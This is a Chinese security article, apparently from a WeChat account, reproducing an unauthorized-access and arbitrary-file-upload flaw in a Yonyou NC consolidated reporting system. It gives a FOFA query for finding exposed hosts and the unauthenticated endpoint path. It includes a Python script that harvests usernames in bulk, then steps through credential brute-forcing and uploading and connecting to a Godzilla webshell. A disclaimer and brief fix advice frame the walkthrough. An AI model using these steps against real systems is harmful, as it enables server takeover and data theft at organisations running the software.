点击上方蓝字关注我们
BEGINNING OF SPRING
0x01
阅读须知
Reading Instructions
数字人才创研院秉承探究学习与交流的理念,一切从降低已有潜在威胁出发,所有发布的技术文章仅供参考,未经授权请勿利用文章中的技术内容对任何计算机系统进行入侵操作,否则对他人或单位而造成的直接或间接后果和损失,均由使用者本人负责。
0x02
漏洞概述
Vulnerability Overview
*友集团企业的合并报表过程已经⾮简单的基于合并⼯作底稿和合并相关准则的合并报表编报会计业务,这个过程或者活动已经升级为管理活动,具有计划性、协调性。
该合并报表系统的service接口存在未授权访问+任意文件上传漏洞,攻击者通过漏洞可以获取可以获取服务器权限信息。
0x03
漏洞复现
Vulnerability Recurrence
fofa:app="*友-UFIDA-NC"
1.执行如下POC进行未授权访问信息的探测,可以获取系统用户名敏感信息。
/service/~iufo/com.ufida.web.action.ActionServlet?TableSelectedID&TreeSelectedID&action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease
---http://目标资产/service/...---
2.编写脚本快速获取目标资产用户名敏感信息
import re
import requests
with open('urls.txt', 'r') as f:
urls = f.readlines()
with open('result.txt', 'w') as f:
for url in urls:
url = url.strip()
try:
response = requests.get(url)
if response.status_code == 200:
pattern = r"'>((.*?))"
matches = re.findall(pattern, response.text)
for match in matches:
f.write(match + 'n')
except requests.exceptions.RequestException as e:
print(f'Error: {e}')
--------【操作说明】--------
首先本地需要创建urls.txt,然后将目标资产的url全路径放置其中,最后再创建result.txt进行结果输出。
3.借助burpsuite进行交叉爆破,得到获取用户名的登录账号和访问密码(登录界面存在验证码复用问题)。
4.登录时会弹出一个新窗口,建议选择不关闭旧窗口,同时在登录状态下的旧窗口借助哥斯拉木马进行发布给已经登录上的账号。
【注意】需要用ie7/8低版本,为了运行安全,建议在虚拟机win7及其以上版本进行访问,由于新窗口做了限制,因此无法进行url修改。
/service/~iufo/com.ufida.web.action.ActionServlet?TableSelectedID&TreeSelectedID&action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease
(文章仅限技术交流,禁止非授权操作!)
5.发布完成后,可以在新窗口中选择该账户点击“我接收到的消息”,即可进行木马查看。
6.复制完整的木马路径并进行哥斯拉的连接,最后完美显示连接成功(可未授权访问该木马)。
http://x.x.x.x/iufotempfile/6g2pcjszy5uaukerd6gv3qbuo61wrb/system_xxxxx.jsp
//参考马马地址如上
(文章仅限技术交流,禁止非授权操作!)
0x04
漏洞脚本
Vulnerability script
1.Nuclei验证脚本命令使用如下:
nuclei.exe -t youNC-service-unauthorized-access.yaml -l youNC-service-unauthorized-access_Subs.txt
--------------------------------------------
youNC-service-unauthorized-access_Subs.txt可以结合实际情况自定义
--------------------------------------------
2.Nuclei的运行截图如下:
3.关注公众号回复:用友NC ,获取脚本
0x05
修复建议
Repair Suggestions
1.实施产品的权限访问控制,降低互联网搜索引擎的查询。
2.加强后台认证要求(如AAAA策略等),提高口令的安全性。
3.增强关键页面的安全性,提升WEB后台的安全访问控制权限能力。
往期推荐 · 值得阅看
2023全网最优渗透研学靶场汇总(上)
2023-02-23
漏洞复现|北京网康 NS-ASG安全网关存在远程命令执行漏洞
2023-06-19
漏洞复现|深信服科技EDR平台存在任意用户登录漏洞
2023-06-07
漏洞复现|联软科技安全准入门户平台存在远程代码执行漏洞
2023-06-02
PHPMyadmin的Getshell方法汇总
2023-07-01
知识分享|Redis未授权访问漏洞汇集
2023-06-26
END
原文始发于微信公众号(数字人才创研院):漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论